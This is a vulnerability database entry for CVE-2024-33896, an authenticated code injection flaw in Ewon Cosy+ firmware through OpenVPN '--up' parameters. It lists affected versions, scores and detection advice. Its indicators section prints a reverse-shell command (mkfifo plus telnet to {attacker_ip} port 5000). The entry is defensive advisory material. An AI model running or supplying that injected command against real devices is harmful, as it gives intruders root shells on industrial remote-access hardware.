cbcvebase.
CVE-2024-33896
published 2024-08-02

CVE-2024-33896: Cosy+ devices running a firmware 21.x below 21.2s10 or a firmware 22.x below 22.1s3 are vulnerable to code injection due to improper parameter blacklisting…

PriorityP354high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
4.02%
89.3th percentile
Cosy+ devices running a firmware 21.x below 21.2s10 or a firmware 22.x below 22.1s3 are vulnerable to code injection due to improper parameter blacklisting. This is fixed in version 21.2s10 and 22.1s3.

Affected

2 ranges
VendorProductVersion rangeFixed in
hms-networksewon_cosy_+_firmware21.0 – 21.2s10
hms-networksewon_cosy_+_firmware22.0 – 22.1s3

Detection & IOCsextracted from sources · hover to see the quote

command--up '/bin/sh -c "TF=$(mktemp -u);mkfifo $TF;telnet {attacker_ip} 5000 0$TF"'
filenamemalicious_config.ovpn
port5000
  • Detect upload of OpenVPN configuration files containing the '--up' or '--down' parameters to Ewon Cosy+ devices, as these are the injected parameters used to execute arbitrary OS commands.
  • Alert on outbound telnet connections (TCP port 23) or reverse shell patterns (mkfifo + telnet) originating from Ewon Cosy+ devices, indicative of successful exploitation.
  • Monitor for 'script-security 2' in uploaded OpenVPN config files on Cosy+ devices; this directive is required to enable execution of --up/--down scripts and is a strong indicator of malicious intent.
  • The exploit runs as root on the device; any unexpected root-level process spawned from the OpenVPN process tree on Cosy+ should be treated as a high-severity indicator of compromise.
  • ·Exploitation requires authentication; the attacker must have valid credentials to upload the malicious OpenVPN configuration file to the device.
  • ·Affected firmware versions are 21.x below 21.2s10 and 22.x below 22.1s3; devices on these versions should be prioritized for patching.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.